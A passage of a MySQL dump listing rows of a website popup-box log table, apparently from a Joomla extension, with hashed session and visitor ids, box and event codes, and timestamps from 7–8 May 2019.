(93045, 'cd20b9ce01c576a8ff44dbcc4bee8da9', '0c3b18a297f7fa46', 0, 2, 1, '2019-05-07 06:06:03'),
(93046, '7c3494db720e5867842538ccbeb19122', 'fc702cc34c03471c', 0, 2, 1, '2019-05-07 06:06:19'),
(93047, 'eefa69c0792c55e0b31f6ba089ceb8ef', '48ae1f588b0d2ee6', 0, 2, 1, '2019-05-07 06:06:20'),
(93048, '683162f6174691ec7928e358f468d024', 'cb1805ab847b2d09', 0, 2, 1, '2019-05-07 06:06:50'),
(93049, '7c3494db720e5867842538ccbeb19122', 'fc702cc34c03471c', 0, 2, 1, '2019-05-07 06:07:14'),
(93050, 'a4151c57500c9ddb03a31ae5082b6e21', 'a639f655bef0fc87', 0, 2, 1, '2019-05-07 06:07:15'),
(93051, 'cd20b9ce01c576a8ff44dbcc4bee8da9', '0c3b18a297f7fa46', 0, 2, 1, '2019-05-07 06:07:31'),
(93052, 'cd20b9ce01c576a8ff44dbcc4bee8da9', '0c3b18a297f7fa46', 0, 2, 1, '2019-05-07 06:07:52'),
(93053, 'cd20b9ce01c576a8ff44dbcc4bee8da9', '0c3b18a297f7fa46', 0, 2, 1, '2019-05-07 06:08:05'),
(93054, '27ee6442ffebb5d31c7397f2c831cfd0', '61f99f7954cfc6e5', 0, 2, 1, '2019-05-07 06:08:49'),
(93055, '5b73cb5078cd0d99faaadf09fc8c1b09', '7a636002c64226bf', 0, 2, 1, '2019-05-07 06:08:50'),
(93056, '5b73cb5078cd0d99faaadf09fc8c1b09', '7a636002c64226bf', 0, 2, 1, '2019-05-07 06:09:02'),
(93057, '71d3f7af7fb7084d54219b19ed2aae9f', 'd4286ce448126096', 0, 2, 1, '2019-05-07 06:10:39'),
(93058, '71d3f7af7fb7084d54219b19ed2aae9f', 'd4286ce448126096', 0, 2, 1, '2019-05-07 06:10:46'),
(93059, '4492aecf625d6e5fcd3f01e3798add9c', '2d51200ba62a105e', 0, 2, 1, '2019-05-07 06:13:06'),
(93060, '51557e6d7b2b713aa01aa10e1c773af3', 'cadb6beda56acb2e', 0, 2, 1, '2019-05-07 06:14:04'),
(93061, '51557e6d7b2b713aa01aa10e1c773af3', 'cadb6beda56acb2e', 0, 2, 1, '2019-05-07 06:14:17'),
(93062, 'b20e1736bd35706143105edddca0c85c', '086f4ac25342203e', 0, 2, 1, '2019-05-07 06:15:06'),
(93063, 'c7a118097d7ae9041d60b492be6d4ea3', '8ad24f4e888a3b80', 0, 2, 1, '2019-05-07 06:16:05'),
(93064, 'c7a118097d7ae9041d60b492be6d4ea3', '8ad24f4e888a3b80', 0, 2, 1, '2019-05-07 06:16:12'),
(93065, '27ee6442ffebb5d31c7397f2c831cfd0', '61f99f7954cfc6e5', 0, 2, 1, '2019-05-07 06:17:41'),
(93066, 'c022ecdc2b004f494a308454d39eb6e5', '7340106347808725', 0, 2, 1, '2019-05-07 06:18:51'),
(93067, '118e4703998915f034e1eb9584402cfe', '08b50b2c3300858b', 0, 2, 1, '2019-05-07 06:19:24'),
(93068, '8e5592ffcfbb8957d591d09d1857b005', '3371af0459389eff', 0, 2, 1, '2019-05-07 06:19:48'),
(93069, 'c022ecdc2b004f494a308454d39eb6e5', '7340106347808725', 0, 2, 1, '2019-05-07 06:21:49'),
(93070, '358c0ba84caad5d1f64657af67dc2634', 'a097b76ffd087ad5', 0, 2, 1, '2019-05-07 06:23:37'),
(93071, '358c0ba84caad5d1f64657af67dc2634', 'a097b76ffd087ad5', 0, 2, 1, '2019-05-07 06:23:41'),
(93072, '358c0ba84caad5d1f64657af67dc2634', 'a097b76ffd087ad5', 0, 2, 1, '2019-05-07 06:23:55'),
(93073, 'ba7e2f1112bfc0f85f7b1a73cdecf3d1', '15a0d96bfa1f242f', 0, 2, 1, '2019-05-07 06:25:09'),
(93074, '358c0ba84caad5d1f64657af67dc2634', 'a097b76ffd087ad5', 0, 2, 1, '2019-05-07 06:25:12'),
(93075, 'e8d6f60fbc749b2990beb9441643c983', '686035a3ccb28b20', 0, 2, 1, '2019-05-07 06:25:16'),
(93076, '358c0ba84caad5d1f64657af67dc2634', 'a097b76ffd087ad5', 0, 2, 1, '2019-05-07 06:25:58'),
(93077, '9fafc76380d303cfcb0049288b0b196f', 'a99c82dd76d590ee', 0, 2, 1, '2019-05-07 06:26:13'),
(93078, '68d4024434ab87144edf1fcacd367c6f', 'c327f1afb5d923fa', 0, 2, 1, '2019-05-07 06:26:19'),
(93079, '2420b5197690c38652b367a92dd6be64', '59a7ea1953b4a6b9', 0, 2, 1, '2019-05-07 06:26:22'),
(93080, 'e8d6f60fbc749b2990beb9441643c983', '686035a3ccb28b20', 0, 2, 1, '2019-05-07 06:27:35'),
(93081, '41828f66d8fcccfd6aa04cb75c788aa0', '93e0ffe7e12ab9ba', 0, 2, 1, '2019-05-07 06:31:57'),
(93082, 'a12e2c033902e9e356f053981015c901', 'a4606350cb27c277', 0, 2, 1, '2019-05-07 06:32:20'),
(93083, '06c63278f5142ef66ddac5aaa8017071', 'd65a3db6eee97b59', 0, 2, 1, '2019-05-07 06:33:13'),
(93084, 'c7a118097d7ae9041d60b492be6d4ea3', '8ad24f4e888a3b80', 0, 2, 1, '2019-05-07 06:33:34'),
(93085, '07727646b1a0c46cc63fe70a77690a29', 'e1eefe92ff5dbc8b', 0, 2, 1, '2019-05-07 06:40:45'),
(93086, '07727646b1a0c46cc63fe70a77690a29', 'e1eefe92ff5dbc8b', 0, 2, 1, '2019-05-07 06:41:20'),
(93087, '61518ed16bc1f237781538f22fc40ed5', '0ad35b7243e17bab', 0, 2, 1, '2019-05-07 06:45:52'),
(93088, '07727646b1a0c46cc63fe70a77690a29', 'e1eefe92ff5dbc8b', 0, 2, 1, '2019-05-07 06:48:54'),
(93089, '07727646b1a0c46cc63fe70a77690a29', 'e1eefe92ff5dbc8b', 0, 2, 1, '2019-05-07 06:49:33'),
(93090, 'a12e2c033902e9e356f053981015c901', 'a4606350cb27c277', 0, 2, 1, '2019-05-07 06:56:20'),
(93091, 'e64f94ad7dac5699be58dc613ef234e9', '93e0ffe7e12ab9ba', 0, 2, 1, '2019-05-07 06:56:22'),
(93092, '8d318aa0b6d85e6f794e112b68288a50', 'c82195f7827b9487', 0, 2, 1, '2019-05-07 06:57:04'),
(93093, '9e03454fe7fe94a18e1abd34f0a04fd6', '238f31baa72c2a2f', 0, 2, 1, '2019-05-07 07:03:48'),
(93094, 'e729b671e133c61dd7221a93f960a513', 'd47b8fa09c949c04', 0, 2, 1, '2019-05-07 07:09:24'),
(93095, '51c2db537761d52de4a3ea0384add014', 'f8b5e764055271f9', 0, 2, 1, '2019-05-07 07:10:03'),
(93096, '51c2db537761d52de4a3ea0384add014', 'f8b5e764055271f9', 0, 2, 1, '2019-05-07 07:10:36'),
(93097, '07727646b1a0c46cc63fe70a77690a29', 'e1eefe92ff5dbc8b', 0, 2, 1, '2019-05-07 07:12:23'),
(93098, '07727646b1a0c46cc63fe70a77690a29', 'e1eefe92ff5dbc8b', 0, 2, 1, '2019-05-07 07:12:49'),
(93099, '9f7dc8480b169584884749ef152c4e31', 'beebdfd637cefeb2', 0, 2, 1, '2019-05-07 07:13:39'),
(93100, '9f7dc8480b169584884749ef152c4e31', 'beebdfd637cefeb2', 0, 2, 1, '2019-05-07 07:14:23'),
(93101, 'f2e55d4875384e2ac4517c1f02979225', '92c0a138d1c36fa3', 0, 2, 1, '2019-05-07 07:18:26'),
(93102, 'd08338222e2f1e71813bebe58d184e77', 'b842efafbeb2344c', 0, 2, 1, '2019-05-07 07:18:40'),
(93103, 'e7c640c3a8643e646ba77b461f2dbd48', 'fbe813b412ba3b9f', 0, 2, 1, '2019-05-07 07:18:40'),
(93104, 'f2e55d4875384e2ac4517c1f02979225', '92c0a138d1c36fa3', 0, 2, 1, '2019-05-07 07:18:47'),
(93105, 'f2e55d4875384e2ac4517c1f02979225', '92c0a138d1c36fa3', 0, 2, 1, '2019-05-07 07:19:56'),
(93106, 'f2e55d4875384e2ac4517c1f02979225', '92c0a138d1c36fa3', 0, 2, 1, '2019-05-07 07:21:12'),
(93107, 'bb8deb2ad7d349d1fd54446311f43cb9', 'a1e2ea8331e86445', 0, 2, 1, '2019-05-07 07:24:49'),
(93108, 'f2e55d4875384e2ac4517c1f02979225', '92c0a138d1c36fa3', 0, 2, 1, '2019-05-07 07:31:35'),
(93109, 'c401fe7bb1fe8a270b5af6fd6aa5a5a3', 'e50451d6d332bac5', 0, 2, 1, '2019-05-07 07:32:05'),
(93110, 'f2e55d4875384e2ac4517c1f02979225', '92c0a138d1c36fa3', 0, 2, 1, '2019-05-07 07:32:24'),
(93111, 'f2e55d4875384e2ac4517c1f02979225', '92c0a138d1c36fa3', 0, 2, 1, '2019-05-07 07:32:52'),
(93112, 'f2e55d4875384e2ac4517c1f02979225', '92c0a138d1c36fa3', 0, 2, 1, '2019-05-07 07:33:18'),
(93113, 'f2e55d4875384e2ac4517c1f02979225', '92c0a138d1c36fa3', 0, 2, 1, '2019-05-07 07:33:45'),
(93114, 'f2e55d4875384e2ac4517c1f02979225', '92c0a138d1c36fa3', 0, 2, 1, '2019-05-07 07:34:17'),
(93115, '51c2db537761d52de4a3ea0384add014', 'f8b5e764055271f9', 0, 2, 1, '2019-05-07 07:35:25'),
(93116, 'f2e55d4875384e2ac4517c1f02979225', '92c0a138d1c36fa3', 0, 2, 1, '2019-05-07 07:35:26'),
(93117, 'f2e55d4875384e2ac4517c1f02979225', '92c0a138d1c36fa3', 0, 2, 1, '2019-05-07 07:35:41'),
(93118, '51c2db537761d52de4a3ea0384add014', 'f8b5e764055271f9', 0, 2, 1, '2019-05-07 07:35:43'),
(93119, '724b2952713d57ac737f9bd2439c7f34', '4de5da03883cf7f4', 0, 2, 1, '2019-05-07 07:40:05'),
(93120, 'cbdb68e1462404ba88bf591e1f138244', 'f999cbee8adc5a8d', 0, 2, 1, '2019-05-07 07:40:14'),
(93121, '17b08b63bcfabe7c34e116bc33109a8e', '6febef12e8f383ea', 0, 2, 1, '2019-05-07 08:04:12'),
(93122, '17b08b63bcfabe7c34e116bc33109a8e', '6febef12e8f383ea', 0, 2, 1, '2019-05-07 08:04:50'),
(93123, '17b08b63bcfabe7c34e116bc33109a8e', '6febef12e8f383ea', 0, 2, 1, '2019-05-07 08:05:26'),
(93124, '17b08b63bcfabe7c34e116bc33109a8e', '6febef12e8f383ea', 0, 2, 1, '2019-05-07 08:05:57'),
(93125, '17b08b63bcfabe7c34e116bc33109a8e', '6febef12e8f383ea', 0, 2, 1, '2019-05-07 08:06:19'),
(93126, '5c694e53d5088342a024d0050bfed74f', '93f30eaefda9d8c4', 0, 2, 1, '2019-05-07 08:18:18'),
(93127, '5c694e53d5088342a024d0050bfed74f', '93f30eaefda9d8c4', 0, 2, 1, '2019-05-07 08:19:12'),
(93128, '5c694e53d5088342a024d0050bfed74f', '93f30eaefda9d8c4', 0, 2, 1, '2019-05-07 08:20:43'),
(93129, '5c694e53d5088342a024d0050bfed74f', '93f30eaefda9d8c4', 0, 2, 1, '2019-05-07 08:21:34'),
(93130, '5c694e53d5088342a024d0050bfed74f', '93f30eaefda9d8c4', 0, 2, 1, '2019-05-07 08:21:55'),
(93131, '288d1566a4ebd4377dfcfc55a5d42013', '61e1a147c61f5fda', 0, 2, 1, '2019-05-07 08:22:49'),
(93132, 'b767a8edf5fad5ad06d76d1e69a339c5', 'cdf6979699ff3eb3', 0, 2, 1, '2019-05-07 08:23:15'),
(93133, '5c694e53d5088342a024d0050bfed74f', '93f30eaefda9d8c4', 0, 2, 1, '2019-05-07 08:29:08'),
(93134, '5c694e53d5088342a024d0050bfed74f', '93f30eaefda9d8c4', 0, 2, 1, '2019-05-07 08:29:46'),
(93135, '5c694e53d5088342a024d0050bfed74f', '93f30eaefda9d8c4', 0, 2, 1, '2019-05-07 08:31:29'),
(93136, '5c694e53d5088342a024d0050bfed74f', '93f30eaefda9d8c4', 0, 2, 1, '2019-05-07 08:40:30'),
(93137, '288d1566a4ebd4377dfcfc55a5d42013', '61e1a147c61f5fda', 0, 2, 1, '2019-05-07 08:40:41'),
(93138, 'e729b671e133c61dd7221a93f960a513', 'd47b8fa09c949c04', 0, 2, 1, '2019-05-07 08:43:30'),
(93139, 'fce5d09eeeb9b470e42fcd0989dd147c', '0bf16c319bd2f666', 0, 2, 1, '2019-05-07 08:51:00'),
(93140, '0aa002a70f204393f22eaabe646a39f4', '8e9a16956483f85e', 0, 2, 1, '2019-05-07 09:17:58'),
(93141, '5bdb8e73c59e1e2afc6c89c47d485a18', 'bd882420bca652e2', 0, 2, 1, '2019-05-07 09:37:34'),
(93142, '5bdb8e73c59e1e2afc6c89c47d485a18', 'bd882420bca652e2', 0, 2, 1, '2019-05-07 09:38:59'),
(93143, '0aa002a70f204393f22eaabe646a39f4', '8e9a16956483f85e', 0, 2, 1, '2019-05-07 09:45:27'),
(93144, 'eab685c5ee4e8e9f4fd809095cfd1fc0', 'fad7ef00226341cb', 0, 2, 1, '2019-05-07 11:22:10'),
(93145, '5865fe141f9bc679aabfe7eb9d78a90b', 'd6b9cd5bfdd27ced', 0, 2, 1, '2019-05-07 12:09:21'),
(93146, '01275adca45863d4a65e52e571a766d4', '19c142655ce4fc18', 0, 2, 1, '2019-05-07 12:15:14'),
(93147, 'f897750971d057e31be7f52a8ac4a755', 'b7114f4357b62774', 0, 2, 1, '2019-05-07 12:16:26'),
(93148, '01275adca45863d4a65e52e571a766d4', '19c142655ce4fc18', 0, 2, 1, '2019-05-07 12:17:20'),
(93149, '240434da7d46b8632a6cd24a4b695749', 'b7114f4357b62774', 0, 2, 1, '2019-05-07 12:18:56'),
(93150, '240434da7d46b8632a6cd24a4b695749', 'b7114f4357b62774', 0, 2, 1, '2019-05-07 12:19:08'),
(93151, '958e2d68b72f1bbd2eefd8d90a2b1acc', '8cf1f4b8bd4cc593', 0, 2, 1, '2019-05-07 13:17:24'),
(93152, '958e2d68b72f1bbd2eefd8d90a2b1acc', '8cf1f4b8bd4cc593', 0, 2, 1, '2019-05-07 13:18:06');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(93153, 'cbf16c055e879c55474d2ba27656e8c1', '0fc27f5e6f9643fa', 0, 2, 1, '2019-05-07 13:32:40'),
(93154, 'fd5b3e8e332343ea034a505c58b88ba7', '2b39b2e0b6e1fba4', 0, 2, 1, '2019-05-07 13:52:49'),
(93155, 'b6597fc98d134082985e435ecd1e75be', '0bf16c319bd2f666', 0, 2, 1, '2019-05-07 14:07:53'),
(93156, 'a20d7c814edb31e53bb0b9893fa91b77', '983927a8fc0337b3', 0, 2, 1, '2019-05-07 14:33:40'),
(93157, 'a20d7c814edb31e53bb0b9893fa91b77', '983927a8fc0337b3', 0, 2, 1, '2019-05-07 14:34:14'),
(93158, 'f65736a18e288e91eecbd406eeb7155c', '6e3c09857671de99', 0, 2, 1, '2019-05-07 14:37:56'),
(93159, '516964d16258cc0eaeb85d0976cc0ecd', '6c8e8fb44d5469ab', 0, 2, 1, '2019-05-07 14:45:43'),
(93160, '516964d16258cc0eaeb85d0976cc0ecd', '6c8e8fb44d5469ab', 0, 2, 1, '2019-05-07 14:45:52'),
(93161, 'b71d69793c17d2cab6b805979b57388f', '429a934a156c7a33', 0, 2, 1, '2019-05-07 14:47:31'),
(93162, 'b71d69793c17d2cab6b805979b57388f', '429a934a156c7a33', 0, 2, 1, '2019-05-07 14:49:29'),
(93163, '7a0c1ffb7744e9fcb951f27ce857adad', '8d0ce8d2f494ec99', 0, 2, 1, '2019-05-07 14:58:52'),
(93164, '96cf11ab69c64c2837ca15e99e03fd60', 'e67416ef443a1169', 0, 2, 1, '2019-05-07 15:07:08'),
(93165, 'bc33fd1ba3c3b99c54d0adc034e9de39', '8b4cd0ad4f7349e4', 0, 2, 1, '2019-05-07 16:01:55'),
(93166, 'bc33fd1ba3c3b99c54d0adc034e9de39', '8b4cd0ad4f7349e4', 0, 2, 1, '2019-05-07 16:03:18'),
(93167, 'bc33fd1ba3c3b99c54d0adc034e9de39', '8b4cd0ad4f7349e4', 0, 2, 1, '2019-05-07 16:03:41'),
(93168, 'bc33fd1ba3c3b99c54d0adc034e9de39', '8b4cd0ad4f7349e4', 0, 2, 1, '2019-05-07 16:04:32'),
(93169, 'fe4465581708b5afa169653641b14826', '0f5283f7d0f38b41', 0, 2, 1, '2019-05-07 16:39:31'),
(93170, 'bc33fd1ba3c3b99c54d0adc034e9de39', '8b4cd0ad4f7349e4', 0, 2, 1, '2019-05-07 16:45:05'),
(93171, '2b6e6a9a79b29aa0c0407d4cb2c43fbc', '9e213db7e354177e', 0, 2, 1, '2019-05-07 16:47:17'),
(93172, 'bc33fd1ba3c3b99c54d0adc034e9de39', '8b4cd0ad4f7349e4', 0, 2, 1, '2019-05-07 16:50:59'),
(93173, 'bc33fd1ba3c3b99c54d0adc034e9de39', '8b4cd0ad4f7349e4', 0, 2, 1, '2019-05-07 16:51:08'),
(93174, 'bc33fd1ba3c3b99c54d0adc034e9de39', '8b4cd0ad4f7349e4', 0, 2, 1, '2019-05-07 16:51:20'),
(93175, 'bc33fd1ba3c3b99c54d0adc034e9de39', '8b4cd0ad4f7349e4', 0, 2, 1, '2019-05-07 16:52:20'),
(93176, '73161de5d76f68214be34e0005577c1d', 'a5a8a5573ddadfcc', 0, 2, 1, '2019-05-07 16:53:46'),
(93177, 'bc33fd1ba3c3b99c54d0adc034e9de39', '8b4cd0ad4f7349e4', 0, 2, 1, '2019-05-07 16:54:20'),
(93178, 'a41ecdd63e573052ac2cafd265329ac2', 'e6c258a33838c9e6', 0, 2, 1, '2019-05-07 17:02:01'),
(93179, 'c085cd3796a8ab97ef5520689969ca01', '2395fa3c4658613a', 0, 2, 1, '2019-05-07 17:03:50'),
(93180, 'a41ecdd63e573052ac2cafd265329ac2', 'e6c258a33838c9e6', 0, 2, 1, '2019-05-07 17:05:57'),
(93181, 'a41ecdd63e573052ac2cafd265329ac2', 'e6c258a33838c9e6', 0, 2, 1, '2019-05-07 17:06:48'),
(93182, 'a41ecdd63e573052ac2cafd265329ac2', 'e6c258a33838c9e6', 0, 2, 1, '2019-05-07 17:07:59'),
(93183, 'a41ecdd63e573052ac2cafd265329ac2', 'e6c258a33838c9e6', 0, 2, 1, '2019-05-07 17:09:14'),
(93184, 'a41ecdd63e573052ac2cafd265329ac2', 'e6c258a33838c9e6', 0, 2, 1, '2019-05-07 17:11:11'),
(93185, '54c2a44b9345ca9b6cd6e3179b67ae1f', '87d280de5167c002', 0, 2, 1, '2019-05-07 17:20:11'),
(93186, 'fa860aa1117ba273b5f9b139d2415494', '12c954daecc3c377', 0, 2, 1, '2019-05-07 17:26:25'),
(93187, '0828961b47719804b38b6b3fe36c8659', '5ce557a8e483a113', 0, 2, 1, '2019-05-07 17:37:30'),
(93188, '5d73a650d6564b25fa49dd5101185c6f', '9d456ea109f798a9', 0, 2, 1, '2019-05-07 17:40:59'),
(93189, '717aa09bcb477038d4ceebf9a59c4f4d', 'a2b92167f54c9dc2', 0, 2, 1, '2019-05-07 17:45:32'),
(93190, '4207c6c3b8710756f64be12d6869fdcb', 'ecd538680cf5133a', 0, 2, 1, '2019-05-07 18:16:11'),
(93191, '4207c6c3b8710756f64be12d6869fdcb', 'ecd538680cf5133a', 0, 2, 1, '2019-05-07 18:16:43'),
(93192, '45932d0b0e5d797510666f7f3e61e964', '60ed8d8f129ec3de', 0, 2, 1, '2019-05-07 18:17:24'),
(93193, '45932d0b0e5d797510666f7f3e61e964', '60ed8d8f129ec3de', 0, 2, 1, '2019-05-07 18:17:40'),
(93194, '4207c6c3b8710756f64be12d6869fdcb', 'ecd538680cf5133a', 0, 2, 1, '2019-05-07 18:22:26'),
(93195, '59a2fb4709e5446e3c9d5943a564eb97', '790c984cdbb7a127', 0, 2, 1, '2019-05-07 19:06:36'),
(93196, '358b1b32f7b200e5bf8df1930df53f86', '1d5126c0be496a04', 0, 2, 1, '2019-05-07 19:24:40'),
(93197, '912b4c5eb797720b7cdbb99bf8b4e2fa', '49e02d957cfd6b0b', 0, 2, 1, '2019-05-07 19:26:32'),
(93198, '4d84f4736d0fdac83e62c166a950bc0c', 'eb2854fabd57280d', 0, 2, 1, '2019-05-07 19:54:55'),
(93199, '8c99e91255d62542df68e465dce711ac', '96a4504a39427d3e', 0, 2, 1, '2019-05-07 20:12:04'),
(93200, '0a5ca377814a2bd8f5c802d3900808c1', '124d176f11c5defe', 0, 2, 1, '2019-05-07 20:21:52'),
(93201, '0a5ca377814a2bd8f5c802d3900808c1', '124d176f11c5defe', 0, 2, 1, '2019-05-07 20:22:17'),
(93202, '63f4382074766fd6057cc80026a2bef5', '21f069d24c94121b', 0, 2, 1, '2019-05-07 20:40:52'),
(93203, '9d31c3b27eb07c5bdabc95e2c970771b', '15c90db28e0421a3', 0, 2, 1, '2019-05-07 21:55:07'),
(93204, '5d9e233930941b9ad29c88058f3a4d19', 'd1dc77040de927a3', 0, 2, 1, '2019-05-07 22:20:51'),
(93205, '5d9e233930941b9ad29c88058f3a4d19', 'd1dc77040de927a3', 0, 2, 1, '2019-05-07 22:32:53'),
(93206, '470a836814f9a951a6297eb897c22448', 'ce51c8385db45cf9', 0, 2, 1, '2019-05-07 22:42:08'),
(93207, '470a836814f9a951a6297eb897c22448', 'ce51c8385db45cf9', 0, 2, 1, '2019-05-07 22:46:03'),
(93208, '358b1b32f7b200e5bf8df1930df53f86', '1d5126c0be496a04', 0, 2, 1, '2019-05-07 23:07:42'),
(93209, 'c00b478dc458ad0f308654873f48a475', 'aa51537be01ca0e7', 0, 2, 1, '2019-05-07 23:12:44'),
(93210, 'c00b478dc458ad0f308654873f48a475', 'aa51537be01ca0e7', 0, 2, 1, '2019-05-07 23:13:19'),
(93211, '5a10c191aadd022a6efd6f389f424120', '1f1853d5477441ce', 0, 2, 1, '2019-05-08 00:27:41'),
(93212, '82879d5fb868e34a413f36c49b2e7be3', '4bd7e4551b23e545', 0, 2, 1, '2019-05-08 00:31:51'),
(93213, 'cddce0e19add506a3ff9b10fbc49559d', '548e6668df4daf98', 0, 2, 1, '2019-05-08 00:34:52'),
(93214, 'f23c8fa5f4bb17cfddc92fcb17b9a544', '2d112dbc92f52184', 0, 2, 1, '2019-05-08 00:45:09'),
(93215, 'cbe25ecc1fa088930c13cad68e1ac83c', '7125c8daa7cab2f2', 0, 2, 1, '2019-05-08 01:36:13'),
(93216, '630848b6b98996dc142336b87658bfde', 'ec08273c891a5625', 0, 2, 1, '2019-05-08 01:36:34'),
(93217, '77ca6bc619fff3b4ae00cd388b14b072', 'dcad296f0b0d7ea6', 0, 2, 1, '2019-05-08 01:36:37'),
(93218, 'f904bf0aaca65a28a801b937f4acd185', 'c9c48a11e433cd09', 0, 2, 1, '2019-05-08 02:29:09'),
(93219, 'f904bf0aaca65a28a801b937f4acd185', 'c9c48a11e433cd09', 0, 2, 1, '2019-05-08 02:29:58'),
(93220, 'f904bf0aaca65a28a801b937f4acd185', 'c9c48a11e433cd09', 0, 2, 1, '2019-05-08 02:30:11'),
(93221, 'f904bf0aaca65a28a801b937f4acd185', 'c9c48a11e433cd09', 0, 2, 1, '2019-05-08 02:31:37'),
(93222, 'abbcab752db8663409a8e06612a08956', '5460924dae1fcc9b', 0, 2, 1, '2019-05-08 04:25:52'),
(93223, 'abbcab752db8663409a8e06612a08956', '5460924dae1fcc9b', 0, 2, 1, '2019-05-08 04:26:55'),
(93224, '854ed1f2b03a17c63c4e064ef3d53c1a', 'a99c82dd76d590ee', 0, 2, 1, '2019-05-08 04:30:00'),
(93225, 'bc6d2f4905a5d45b7160960a6452b833', 'ec298f16abca1ffa', 0, 2, 1, '2019-05-08 04:41:01'),
(93226, 'bc6d2f4905a5d45b7160960a6452b833', 'ec298f16abca1ffa', 0, 2, 1, '2019-05-08 04:41:26'),
(93227, '18b719bb5f3fafff6daafd93981e8777', 'b1f252ea7d591555', 0, 2, 1, '2019-05-08 04:42:52'),
(93228, 'db137ed69731b4bb7f22ca15d827c5b6', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-08 04:43:25'),
(93229, 'bc6d2f4905a5d45b7160960a6452b833', 'ec298f16abca1ffa', 0, 2, 1, '2019-05-08 04:43:50'),
(93230, '1051dd057876cc03b4a7d6f033f1d785', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-08 04:44:22'),
(93231, 'db137ed69731b4bb7f22ca15d827c5b6', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-08 04:48:41'),
(93232, '06dbbdb2ce50289c1475db693df8a471', '656ee2b1a0c780d6', 0, 2, 1, '2019-05-08 04:48:44'),
(93233, 'b4a7bd1f155042478d27ac25971c5f47', '798b19a52dc93d69', 0, 2, 1, '2019-05-08 04:52:26'),
(93234, '68d0fb651140c5ad9bf7f4787a847f77', '3bece7bd84369fae', 0, 2, 1, '2019-05-08 04:53:09'),
(93235, 'c38cdcb8979c8d26661eb04ab620bc2a', 'f19010d8a5f137d0', 0, 2, 1, '2019-05-08 04:54:36'),
(93236, 'db137ed69731b4bb7f22ca15d827c5b6', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-08 04:54:38'),
(93237, 'bc6d2f4905a5d45b7160960a6452b833', 'ec298f16abca1ffa', 0, 2, 1, '2019-05-08 04:54:50'),
(93238, 'db137ed69731b4bb7f22ca15d827c5b6', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-08 04:55:19'),
(93239, 'b17986c430b22e4eeea77c3557ae8fa3', '2d51200ba62a105e', 0, 2, 1, '2019-05-08 04:56:47'),
(93240, '661065c855b45b6610a09cacfe735c5f', 'e3253903040248a2', 0, 2, 1, '2019-05-08 04:56:48'),
(93241, 'b17986c430b22e4eeea77c3557ae8fa3', '2d51200ba62a105e', 0, 2, 1, '2019-05-08 04:56:59'),
(93242, '2a496ce123ee83328275a4d3b3cfaa4d', '9bbbf0cc96b13eb1', 0, 2, 1, '2019-05-08 04:57:08'),
(93243, 'c38cdcb8979c8d26661eb04ab620bc2a', 'f19010d8a5f137d0', 0, 2, 1, '2019-05-08 04:57:27'),
(93244, 'b17986c430b22e4eeea77c3557ae8fa3', '2d51200ba62a105e', 0, 2, 1, '2019-05-08 04:57:34'),
(93245, 'e4e04d55d396e92ab53c4e8b8366b96e', 'cb9fbcda504bf89a', 0, 2, 1, '2019-05-08 04:57:45'),
(93246, '1051dd057876cc03b4a7d6f033f1d785', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-08 04:57:47'),
(93247, 'db137ed69731b4bb7f22ca15d827c5b6', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-08 04:57:49'),
(93248, '982e7ac095f0ca8b0b4d2bfa99070028', '11eac86438ea6332', 0, 2, 1, '2019-05-08 04:57:54'),
(93249, '727010f2cbefc5a687c85da4bad6c80b', '494698611efddd5a', 0, 2, 1, '2019-05-08 04:58:11'),
(93250, 'e4e04d55d396e92ab53c4e8b8366b96e', 'cb9fbcda504bf89a', 0, 2, 1, '2019-05-08 04:58:25'),
(93251, '49c2842db4b4cbb0310810fec73f9242', 'df2f194cea195593', 0, 2, 1, '2019-05-08 04:58:56'),
(93252, 'b17986c430b22e4eeea77c3557ae8fa3', '2d51200ba62a105e', 0, 2, 1, '2019-05-08 04:58:57'),
(93253, '96cf11ab69c64c2837ca15e99e03fd60', 'e67416ef443a1169', 0, 2, 1, '2019-05-08 04:59:04'),
(93254, 'db137ed69731b4bb7f22ca15d827c5b6', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-08 04:59:28'),
(93255, '96cf11ab69c64c2837ca15e99e03fd60', 'e67416ef443a1169', 0, 2, 1, '2019-05-08 04:59:30'),
(93256, 'b17986c430b22e4eeea77c3557ae8fa3', '2d51200ba62a105e', 0, 2, 1, '2019-05-08 04:59:42'),
(93257, '727010f2cbefc5a687c85da4bad6c80b', '494698611efddd5a', 0, 2, 1, '2019-05-08 04:59:46'),
(93258, '393bb9b8d5a1d1311eec66a9a73977e4', 'a639f655bef0fc87', 0, 2, 1, '2019-05-08 04:59:50'),
(93259, 'bc6d2f4905a5d45b7160960a6452b833', 'ec298f16abca1ffa', 0, 2, 1, '2019-05-08 04:59:59'),
(93260, 'a195bb339d7c3d26a34901a3ef7157e2', '68fcde0515352e44', 0, 2, 1, '2019-05-08 05:00:01'),
(93261, '45932d0b0e5d797510666f7f3e61e964', '60ed8d8f129ec3de', 0, 2, 1, '2019-05-08 05:00:01'),
(93262, 'c38cdcb8979c8d26661eb04ab620bc2a', 'f19010d8a5f137d0', 0, 2, 1, '2019-05-08 05:00:12'),
(93263, 'db137ed69731b4bb7f22ca15d827c5b6', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-08 05:00:23'),
(93264, 'a195bb339d7c3d26a34901a3ef7157e2', '68fcde0515352e44', 0, 2, 1, '2019-05-08 05:00:31'),
(93265, '982e7ac095f0ca8b0b4d2bfa99070028', '11eac86438ea6332', 0, 2, 1, '2019-05-08 05:00:41'),
(93266, 'c38cdcb8979c8d26661eb04ab620bc2a', 'f19010d8a5f137d0', 0, 2, 1, '2019-05-08 05:00:42'),
(93267, '06dbbdb2ce50289c1475db693df8a471', '656ee2b1a0c780d6', 0, 2, 1, '2019-05-08 05:00:45'),
(93268, '982e7ac095f0ca8b0b4d2bfa99070028', '11eac86438ea6332', 0, 2, 1, '2019-05-08 05:00:49'),
(93269, 'ea78d2e75ceae8ad715190c5ef4c2390', '8e9a16956483f85e', 0, 2, 1, '2019-05-08 05:00:57'),
(93270, '06dbbdb2ce50289c1475db693df8a471', '656ee2b1a0c780d6', 0, 2, 1, '2019-05-08 05:01:03'),
